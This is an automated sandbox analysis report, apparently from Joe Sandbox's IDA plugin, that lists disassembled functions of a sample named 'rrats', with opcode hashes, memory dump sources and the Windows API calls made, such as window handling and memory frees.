                                                              • Instruction Fuzzy Hash: C662D7716047859FCB25CF28C4906F9BBE1BF95304F08896DE8EA8B346D738EA45DB11
                                                              Function 00CB77EF Relevance: .8, Instructions: 817COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                              • Instruction ID: 05a2ad6bcbb5c747250dd358d83ac4277fa0fa259c7bdcfde1c4a2fb89b030ba
                                                              • Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                              • Instruction Fuzzy Hash: 7162B5716083858FCB15CF28C8905B9BBE1BFD5304F188A6DEDAA8B346D730E945CB55
                                                              Function 00CAF461 Relevance: .7, Instructions: 694COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                              • Instruction ID: e31e4ec304ec9064acc6a56d895dbc2dfc47706f075a1115257a519ba905f100
                                                              • Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                              • Instruction Fuzzy Hash: B9523A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                              Function 00CB7153 Relevance: .5, Instructions: 536COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4a22f14758ff886800d2f21801ec84327974cf8622922ce1c05d899e4e2cb7a2
                                                              • Instruction ID: b8c62e839d71f82337375de5524540d1e148c048ae88b9579aba949aad727e7c
                                                              • Opcode Fuzzy Hash: 4a22f14758ff886800d2f21801ec84327974cf8622922ce1c05d899e4e2cb7a2
                                                              • Instruction Fuzzy Hash: 7612C1B16087069FC728CF28C490AB9B7E1FF94304F148A2EE996C7780E734E995DB45
                                                              Function 00CAC426 Relevance: .5, Instructions: 454COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c9a0788a0853c4ad9995f1ce5c6070a64e594a890393df94407baf0bfc7a70c
                                                              • Instruction ID: 03c1ce28fd8710d40f80db24d83b842f0e326c5451482e11fbd84063342ee197
                                                              • Opcode Fuzzy Hash: 6c9a0788a0853c4ad9995f1ce5c6070a64e594a890393df94407baf0bfc7a70c
                                                              • Instruction Fuzzy Hash: 52F18971A083028FC718CF29C5C4A2EBBE5FF9A318F154A2EF496D7255D630EA458B46
                                                              Function 00CAE9B7 Relevance: .3, Instructions: 320COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 458b409b802cc795dc5a441d9cf110191d3e30ff2c19d9311f1b9018b1576c10
                                                              • Instruction ID: e535c4c8564f3b7f32a56d0c6e312c5f4b85b0a80b1a5b918a213b052dc25b1a
                                                              • Opcode Fuzzy Hash: 458b409b802cc795dc5a441d9cf110191d3e30ff2c19d9311f1b9018b1576c10
                                                              • Instruction Fuzzy Hash: E9E147755183948FC304CF29D88096EBFF0AF9A314F46095EF9D49B352C235EA19DBA2
                                                              Function 00CB4088 Relevance: .3, Instructions: 270COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                              • Instruction ID: cd23999b681ada56532648fb445f07e4e6da1ef8efca42042ef954935a77ed97
                                                              • Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                              • Instruction Fuzzy Hash: F29167B060834A9BDB2CEEA8D895BFE77D5EB61304F10092CF596872C3DB349645E352
                                                              Function 00CB43BF Relevance: .2, Instructions: 243COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                              • Instruction ID: abefc68aebdcfc362c05d49eae353beb2692af992bbbfd0f199748d051e66b67
                                                              • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                              • Instruction Fuzzy Hash: 9B814AB17087465BDB3CDE68C8D1BFD37D4AB91308F00092DE9968B283DA74898AD756
                                                              Function 00CC51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 081f475b9aef60b3334e3aeada960cdc378e45b6a815b57280eca043e5493d33
                                                              • Instruction ID: 5d76d0fe737ac2e722cfa6e7acec0c5ecf40d9c598e43879579272764611d705
                                                              • Opcode Fuzzy Hash: 081f475b9aef60b3334e3aeada960cdc378e45b6a815b57280eca043e5493d33
                                                              • Instruction Fuzzy Hash: A5619871A00F4957DB389A68DC95FBE23D8EB11350F18061EE893DF291D691FFC2A215
                                                              Function 00CC4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                              • Instruction ID: f3c214f002198114e4574b749f802be5fdaefcbfdb18085366e5774f5a753a5d
                                                              • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                              • Instruction Fuzzy Hash: 13514961600F445BDF388668C56AFBF27C59B01300F58491DE893DB682C615FFC69396
                                                              Function 00CAEFE2 Relevance: .2, Instructions: 161COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 43c46a0957200aeb69e41f60fd7c8a31d56220687d6ce1ebf195216b44dfb25f
                                                              • Instruction ID: 979ae0176922a3a0fbf76a57c09d679de873720355528d155b855830786253d7
                                                              • Opcode Fuzzy Hash: 43c46a0957200aeb69e41f60fd7c8a31d56220687d6ce1ebf195216b44dfb25f
                                                              • Instruction Fuzzy Hash: 7F51D3315083D68ED702DF64C58046EBFE0AE9B318F4909AEE5D95B243C231DB4BDB62
                                                              Function 00CB00B7 Relevance: .1, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e9de910e3b44b1c5a64980c0c03f89b4e0cecee9c5ab5de1f5de5bec3ba685c6
                                                              • Instruction ID: 1ef9d006d2032baaf4b1da4aec83fcc722453a9d99c2ca89b1904c295287e681
                                                              • Opcode Fuzzy Hash: e9de910e3b44b1c5a64980c0c03f89b4e0cecee9c5ab5de1f5de5bec3ba685c6
                                                              • Instruction Fuzzy Hash: 3551EFB1A087119FC748CF19D48065AF7E1FF88314F058A2EE899E3340D734EA59CB9A
                                                              Function 00CB3E0B Relevance: .1, Instructions: 112COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                              • Instruction ID: e43b8090604f03a959ddee17f74a740431649f29fdd031342c8fe1f8799347d7
                                                              • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                              • Instruction Fuzzy Hash: D631F8B1A147878FCB18DF68C8511AEBBE0FB95304F10452DE495C7342C739EA0ACB91
                                                              Function 00CAE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00CAE30E
                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                • Part of subcall function 00CB1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00CE1030,?,00CAD928,00000000,?,00000050,00CE1030), ref: 00CB1DC4
                                                              • _strlen.LIBCMT ref: 00CAE32F
                                                              • SetDlgItemTextW.USER32(?,00CDE274,?), ref: 00CAE38F
                                                              • GetWindowRect.USER32(?,?), ref: 00CAE3C9
                                                              • GetClientRect.USER32(?,?), ref: 00CAE3D5
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00CAE475
                                                              • GetWindowRect.USER32(?,?), ref: 00CAE4A2
                                                              • SetWindowTextW.USER32(?,?), ref: 00CAE4DB
                                                              • GetSystemMetrics.USER32(00000008), ref: 00CAE4E3
                                                              • GetWindow.USER32(?,00000005), ref: 00CAE4EE
                                                              • GetWindowRect.USER32(00000000,?), ref: 00CAE51B
                                                              • GetWindow.USER32(00000000,00000002), ref: 00CAE58D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                              • String ID: $%s:$CAPTION$d
                                                              • API String ID: 2407758923-2512411981
                                                              • Opcode ID: c168814d20279b3dcdb63a0c1ae460502c9be8c043619de72249c79ebd45a487
                                                              • Instruction ID: b89b47cfe023fbc73f0a41d79cc8010ec880ec05f004e5763ad9487374541c28
                                                              • Opcode Fuzzy Hash: c168814d20279b3dcdb63a0c1ae460502c9be8c043619de72249c79ebd45a487
                                                              • Instruction Fuzzy Hash: 6481B171608301AFD710DFA8CC89B6FBBEDEB89708F04091DFA99D7250D630E9058B62
                                                              Function 00CCCB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 00CCCB66
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC71E
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC730
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC742
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC754
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC766
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC778
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC78A
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC79C
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7AE
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7C0
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7D2
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7E4
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7F6
                                                              • _free.LIBCMT ref: 00CCCB5B
                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                              • _free.LIBCMT ref: 00CCCB7D
                                                              • _free.LIBCMT ref: 00CCCB92
                                                              • _free.LIBCMT ref: 00CCCB9D
                                                              • _free.LIBCMT ref: 00CCCBBF
                                                              • _free.LIBCMT ref: 00CCCBD2
                                                              • _free.LIBCMT ref: 00CCCBE0
                                                              • _free.LIBCMT ref: 00CCCBEB
                                                              • _free.LIBCMT ref: 00CCCC23
                                                              • _free.LIBCMT ref: 00CCCC2A
                                                              • _free.LIBCMT ref: 00CCCC47
                                                              • _free.LIBCMT ref: 00CCCC5F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: beaba5b339a57080864fca00f973c601def26575867b387696890440471f797e
                                                              • Instruction ID: 48e647183da0de5e250c5088b080d114106660cd6457ff1e8b131a0b4b604379
                                                              • Opcode Fuzzy Hash: beaba5b339a57080864fca00f973c601def26575867b387696890440471f797e
                                                              • Instruction Fuzzy Hash: BE314B31A002069FEB20AA78E886F5BB7E9EF10310F15442DE16ED7192DF35EE84DB10
                                                              Function 00CB9711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00CB9736
                                                              • _wcslen.LIBCMT ref: 00CB97D6
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00CB97E5
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00CB9806
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00CB982D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                              • API String ID: 1777411235-4209811716
                                                              • Opcode ID: 581a18427628f643021847f0e58150160a26f18ef927691a3d20df1ba1b59704
                                                              • Instruction ID: a28f578e5675c39ceb7d5488974b5645ba3ff03902a1f3438fa2dcc44a03846c
                                                              • Opcode Fuzzy Hash: 581a18427628f643021847f0e58150160a26f18ef927691a3d20df1ba1b59704
                                                              • Instruction Fuzzy Hash: DB3116325083517BE725AB34EC46FAF77A8EF42710F14011EF611A61D2EB75DA0983A6
                                                              Function 00CBD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindow.USER32(?,00000005), ref: 00CBD6C1
                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 00CBD6ED
                                                                • Part of subcall function 00CB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CAC116,00000000,.exe,?,?,00000800,?,?,?,00CB8E3C), ref: 00CB1FD1
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00CBD709
                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00CBD720
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00CBD734
                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00CBD75D
                                                              • DeleteObject.GDI32(00000000), ref: 00CBD764
                                                              • GetWindow.USER32(00000000,00000002), ref: 00CBD76D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
